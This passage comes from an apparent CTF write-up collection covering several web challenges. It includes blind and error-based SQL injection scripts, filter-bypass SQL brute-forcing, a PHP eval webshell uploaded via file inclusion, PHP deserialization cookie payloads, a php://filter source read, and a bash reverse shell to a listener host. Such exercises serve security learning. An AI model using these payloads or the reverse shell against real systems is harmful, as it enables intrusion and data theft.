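        if lo == 0:
            break
        out.append(chr(lo))
    return "".join(out)


def count_queries(oracle):
    """Wrap an oracle so the number of requests it answered can be measured."""
    calls = {"n": 0}

    def counted(position, n):
        calls["n"] += 1
        return oracle(position, n)

    return counted, calls


if __name__ == "__main__":
    counted, calls = count_queries(simulated_oracle)
    print(extract(counted), "after", calls["n"], "queries")
```

Comparing ascii() values sidesteps the collation entirely, which is why it recovers the case exactly; the per-character cost is log2(128) = 7 requests regardless of which character it is.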

The challenge says to lowercase everything (string comparison under the default collation is case-insensitive, which is why the extracted letters are uppercase); the real trap is that an uppercase I looks just like a lowercase l, and I did not spot it. Other people's approaches:

Approach 1:

import requests

BASE = 'http://120.24.86.145:9004/Once_More.php?id=1%27and%20'
CHARS = 'abcdefghijklmnopqrstuvwxyz0123456789!@$%^&*()_+=-|}{:?><[];,.`~'
CHARS_DATA = CHARS + 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
# note: %, &, # and + in CHARS would need URL-encoding to survive in a query string

db_len = 0
db_name = ''


def length_schema():
    """Length of the current database name via length(database())=x."""
    global db_len
    for x in range(1, 20):
        url = BASE + 'length(database())=' + str(x) + '%23'
        s = requests.get(url)
        if "Hello" in s.text:
            print('schema_length is :' + str(x))
            db_len = x
            break


def schema_name():
    """Database name, one character at a time, via mid(database(),x,1)='c'."""
    global db_name
    name = ''
    for x in range(1, db_len + 1):
        for i in CHARS:
            url = BASE + 'mid(database(),' + str(x) + ',1)=%27' + i + '%27%23'
            s = requests.get(url)
            if "Hello" in s.text:
                name = name + i
    print('schema_name is :' + name)
    db_name = name


def ascii_eq(subquery, pos, ch):
    """ascii(mid((subquery),pos,1))=ascii('ch'): comparing numbers sidesteps
    the case-insensitive string collation."""
    url = BASE + 'ascii(mid((' + subquery + '),' + str(pos) + ',1))=ascii(%27' + ch + '%27)%23'
    return "Hello" in requests.get(url).text


def dump_all():
    """Tables, then the columns of each table, then the rows of each column."""
    for x in range(0, 20):
        table_name = ''
        for y in range(1, 20):
            key = 0
            for i in CHARS:
                if ascii_eq('select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27' + db_name + '%27%20limit%20' + str(x) + ',1', y, i):
                    key = 1
                    table_name = table_name + i
            if key == 0:
                break
        if table_name == '':
            break
        print('one of tables is:' + table_name)
        for p in range(0, 20):
            column_name = ''
            for q in range(1, 20):
                key = 0
                for i in CHARS:
                    if ascii_eq('select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27' + db_name + '%27%20and%20table_name=%27' + table_name + '%27%20limit%20' + str(p) + ',1', q, i):
                        key = 1
                        column_name = column_name + i
                if key == 0:
                    break
            if column_name == '':
                break
            print('a column name of ' + table_name + ' is ' + column_name)
            for y in range(0, 10):
                data = ''
                for z in range(1, 20):
                    key = 0
                    for i in CHARS_DATA:
                        if ascii_eq('select%20' + column_name + '%20from%20`' + db_name + '`.' + table_name + '%20limit%20' + str(y) + ',1', z, i):
                            data = data + i
                            key = 1
                    if key == 0:
                        break
                if data == '':
                    break
                print('one data of ' + db_name + '.' + table_name + '\'s ' + column_name + ' is ' + data)


def main():
    length_schema()
    schema_name()
    dump_all()


if __name__ == '__main__':
    main()

Lesson: ascii() returns the numeric code of the character, so the comparison is done on numbers rather than with the collation-dependent string comparison.

Approach 2:

# tables
http://120.24.86.145:9004/Once_More.php?id=1' and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database()),'~'),3) %23
# result
Nobody!
XPATH syntax error: '~class,flag2~'

# columns
?id=1' and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag2'),'~'),3) %23
# result
Nobody!
XPATH syntax error: '~flag2,address~'

# data
?id=1' and updatexml(1,concat('~',(select flag2 from flag2),'~'),3) %23
# result
Nobody!
XPATH syntax error: '~flag{Bugku-sql_6s-2i-4t-bug}~'

Error-based output via updatexml(): the bogus XPath expression is echoed back in the MySQL error message, so the query result leaks through the error text (at most 32 characters per error, hence the '~' delimiters). New trick learned.

40. PHP_encrypt_1 (ISCCCTF)

The challenge gives encrypt(); write the matching decrypt():

<?php

$str = "fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA=";
function encrypt($data,$key)
{
$key = md5('ISCC');
$x = 0;
$char = '';
$str = '';
$len = strlen($data);
$klen = strlen($key);
for ($i=0; $i < $len; $i++) {
if ($x == $klen)
{
$x = 0;
}
$char .= $key[$x];
$x+=1;
}
for ($i=0; $i < $len; $i++) {
$str .= chr((ord($data[$i]) + ord($char[$i])) % 128);
}
return base64_encode($str);
}

function decrypt($str){
$str = base64_decode($str);
$key = md5('ISCC');
$x = 0;
$char = "";
$str1 = "";
$len = strlen($str);
$klen = strlen($key);
for ($i=0; $i < $len; $i++) {
if ($x == $klen)
{
$x = 0;
}
$char .= $key[$x];
$x+=1;
}
for ($i=0; $i < $len; $i++) {
if( (ord($str[$i])- ord($char[$i])) <0){
$str1 .= chr(ord($str[$i]) + 128 - ord($char[$i]));
}else{

$str1 .= chr((ord($str[$i]) - ord($char[$i])));
}
}
return $str1;
}

$str1 = decrypt($str);
echo $str1;

?>
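The encrypt() above is a repeating-key additive cipher: each plaintext byte has the corresponding byte of the hex digest md5('ISCC') added to it mod 128, and the result is Base64-encoded. As an added example (my code, not the challenge's), the same cipher in Python with a decrypt that inverts it by subtracting mod 128, which replaces the if/else wrap-around in the PHP decrypt, plus a round-trip check. The flag value itself is not asserted here, only that the decoder inverts the encoder on the page's ciphertext.

```python
import base64
import hashlib

CIPHERTEXT = "fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA="


def key_stream(length, secret="ISCC"):
    """Key bytes: the 32 hex characters of md5(secret), repeated to the required length."""
    key = hashlib.md5(secret.encode()).hexdigest().encode()
    return bytes(key[i % len(key)] for i in range(length))


def encrypt(plaintext):
    """Port of the challenge's encrypt(): (p + k) mod 128 per byte, then Base64."""
    data = plaintext.encode("latin-1")
    ks = key_stream(len(data))
    out = bytes((d + k) % 128 for d, k in zip(data, ks))
    return base64.b64encode(out).decode()


def decrypt(token):
    """Inverse: (c - k) mod 128 undoes (p + k) mod 128 for 7-bit plaintext.
    Python's % is already non-negative, so no wrap-around branch is needed."""
    data = base64.b64decode(token)
    ks = key_stream(len(data))
    return bytes((c - k) % 128 for c, k in zip(data, ks)).decode("latin-1")


if __name__ == "__main__":
    print(decrypt(CIPHERTEXT))
```

Because the key repeats every 32 bytes and the operation is a plain addition, any plaintext longer than the key, or any known-plaintext pair, recovers key bytes directly; the construction gives no security beyond obscurity of the secret word.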

41. File inclusion 2 (文件包含2)

1. The page source reveals upload.php.
2. Upload a file named 1.php;.jpg; it is renamed to .jpg.
3. The index has a file inclusion bug: view-source:http://123.206.31.85:49166/index.php?file=./upload/201812050156179400.jpg includes the uploaded image and shows the one-liner's contents.
4. The one-liner was filtered: both <?php and ?> are replaced with _. So use a form containing neither: <?= @eval($_GET[c]);  (the short echo tag, with the closing ?> omitted, which PHP allows at end of file)
5. Upload that and connect to it to get the flag.

42. flag.php

1. It takes a GET parameter; I got stuck on the very first step: http://123.206.87.240:8002/flagphp/?hint=123
The code:

<?php
error_reporting(0);
include_once("flag.php");
$cookie = $_COOKIE['ISecer'];
if(isset($_GET['hint'])){
show_source(__FILE__);
}
elseif (unserialize($cookie) === "$KEY")
{
echo "$flag";
}
else {
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Login</title>
<link rel="stylesheet" href="admin.css" type="text/css">
</head>
<body>
<br>
<div class="container" align="center">
<form method="POST" action="#">
<p><input name="user" type="text" placeholder="Username"></p>
<p><input name="password" type="password" placeholder="Password"></p>
<p><input value="Login" type="button"/></p>
</form>
</div>
</body>
</html>

<?php
}
$KEY='ISecer:www.isecer.com';
?>

I assumed $KEY had to equal that string; too naive: $KEY is assigned only after the comparison, so at that point it is undefined and "$KEY" interpolates to the empty string.

Set the cookie ISecer=s:0:""; (the serialized empty string, trailing semicolon included) to get the flag.
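Challenges 25 and 42 both need a hand-written PHP serialized value: an object with one property there, the empty string here. As an added example (my code, not the page's), a small serializer that emits PHP's format for the scalar, array and object cases, using byte lengths as PHP does; PhpObject is my own helper type, not anything from the challenges.

```python
class PhpObject:
    """A PHP object to serialize: class name plus public properties, in order."""

    def __init__(self, classname, **props):
        self.classname = classname
        self.props = props


def php_serialize(value):
    """Emit PHP's serialize() format.  String lengths are byte lengths of the
    UTF-8 encoding, which is what unserialize() checks against."""
    if value is None:
        return "N;"
    if isinstance(value, bool):          # must come before int: True is an int
        return "b:%d;" % int(value)
    if isinstance(value, int):
        return "i:%d;" % value
    if isinstance(value, str):
        return 's:%d:"%s";' % (len(value.encode("utf-8")), value)
    if isinstance(value, (list, tuple)):
        items = "".join(php_serialize(i) + php_serialize(v) for i, v in enumerate(value))
        return "a:%d:{%s}" % (len(value), items)
    if isinstance(value, dict):
        items = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return "a:%d:{%s}" % (len(value), items)
    if isinstance(value, PhpObject):
        props = "".join(php_serialize(k) + php_serialize(v) for k, v in value.props.items())
        return 'O:%d:"%s":%d:{%s}' % (
            len(value.classname.encode("utf-8")), value.classname, len(value.props), props)
    raise TypeError("unsupported type: " + type(value).__name__)


def challenge25_payload():
    """password= value for challenge 25: a Flag whose __tostring() reads flag.php."""
    return php_serialize(PhpObject("Flag", file="flag.php"))


def challenge42_cookie():
    """ISecer cookie for challenge 42: the serialized empty string, since "$KEY" is "" at compare time."""
    return php_serialize("")


if __name__ == "__main__":
    print(challenge25_payload())
    print(challenge42_cookie())
```

Getting the byte length right matters: unserialize() reads exactly that many bytes and then expects the closing quote, so a multi-byte character counted as one character makes the whole payload fail to parse.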

42. SQL injection 2 (sql注入2)

A source-leak challenge: the .DS_Store file exposes the leaked source.

43. trim's diary (trim的日记本)

Directory scan with 御剑; visiting show.php gives the flag.

44. LOGIN2 (SKCTF)

Capture the request; the response carries a tip that decodes to:

$sql="SELECT username,password FROM admin WHERE username='".$username."'";
if (!empty($row) && $row['password']===md5($password)){
}

The fetched row's password is whatever the UNION returns, so log in with

username: ' union select md5(1),md5(1) #
password: 1

Once logged in, start a listener on your own server:

nc -l -p 8080 -vvv

In the page's input, enter the following to send a reverse shell to port 8080 of your server (111.111.11.12 stands for the listener's address):

|bash -i >& /dev/tcp/111.111.11.12/8080 0>&1

The command the server actually runs is:

ps -aux | grep |bash -i >& /dev/tcp/111.111.11.12/8080 0>&1

which redirects bash's output to the remote socket and its input from it, giving an interactive connection.

ls, then cat the flag.

45. login3 (skctf)

Probe with admin'^(length('and'))^1 # and variations.

Results:

Blocked:

information_schema

and, space, comma

Allowed:

or mid substr

select case when

from

()

<> can stand in for =
Parentheses can separate tokens in place of the filtered spaces

Since information_schema is unavailable, table names have to be guessed from a wordlist.

Taking the table and column wordlists from sqlmap, the script:

import requests


def testTableName(tableName):
    """admin'^(select(1)from(<table>))^1#: if the table exists the query runs and
    the page answers "password error!"; a missing table makes the query fail."""
    url = "http://123.206.31.85:49167/"
    data = {"username": "admin'^(select(1)from(" + str(tableName) + "))^1#", "password": "123"}
    try:
        s1 = requests.post(url, timeout=1, data=data)
        if "password error!" in s1.text:
            print(tableName)
    except requests.exceptions.RequestException:
        print("error")


def getDicSendToWeb(fname):
    """Feed every line of the wordlist to testTableName(), stopping at a blank line."""
    with open(fname, "r") as f:
        for line in f:
            s = line.strip()
            if s == "":
                return
            testTableName(s)


if __name__ == '__main__':
    getDicSendToWeb("C:\\Users\\heiyi\\Desktop\\common-tables.txt")

The table name is admin. Now the columns:

import requests


def testColumnName(columnName):
    """admin'^(select(count(<column>))from(admin))^1#: a nonexistent column makes the query fail."""
    url = "http://123.206.31.85:49167/"
    data = {"username": "admin'^(select(count(" + str(columnName) + "))from(admin))^1#", "password": "123"}
    try:
        s1 = requests.post(url, timeout=1, data=data)
        if "password error!" in s1.text:
            print(columnName)
    except requests.exceptions.RequestException:
        print("error")


def getDicSendToWeb(fname):
    """Feed every line of the wordlist to testColumnName(), stopping at a blank line."""
    with open(fname, "r") as f:
        for line in f:
            s = line.strip()
            if s == "":
                return
            testColumnName(s)


if __name__ == '__main__':
    getDicSendToWeb("C:\\Users\\heiyi\\Desktop\\common-columns.txt")

That gives three columns: username, password, id. Now to extract the password.

A small trap here: in someone else's code the form is mid(... from ...), i.e. the FROM goes inside mid().

I had put the from outside mid() and lost an hour to it.

The final password-extraction function:

The final password-extraction function:

import requests


def testPasswdName():
    s = ""
    for i in range(1, 60):
        for q in "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ{}+-*/=":
            url = "http://123.206.31.85:49167/"
            # mid(x from i) is the comma-free, space-free form of mid(x, i); <> stands in for =
            data = {"username": "admin'^(ascii(mid((select(password)from(admin))from(" + str(i) + ")))<>" + str(ord(q)) + ")^0#", "password": "123"}
            try:
                s1 = requests.post(url, timeout=1, data=data)
                if "error" in s1.text:
                    s = s + q
                    print(i, s)
                    break
            except requests.exceptions.RequestException:
                print("error")
    return s


if __name__ == '__main__':
    testPasswdName()

46. File upload 2 (湖湘杯)

Despite the name, this is a file inclusion bug:
view-source:http://123.206.87.240:9011/?op=php://filter/read=convert.base64-encode/resource=flag
Base64-decode the output to get the flag.

47. login4

The hint is "CBC byte-flipping attack"; time to go and read up on it.

Putting cryptography aside for now; I'll come back to it once my misc, reverse and pwn basics are solid.
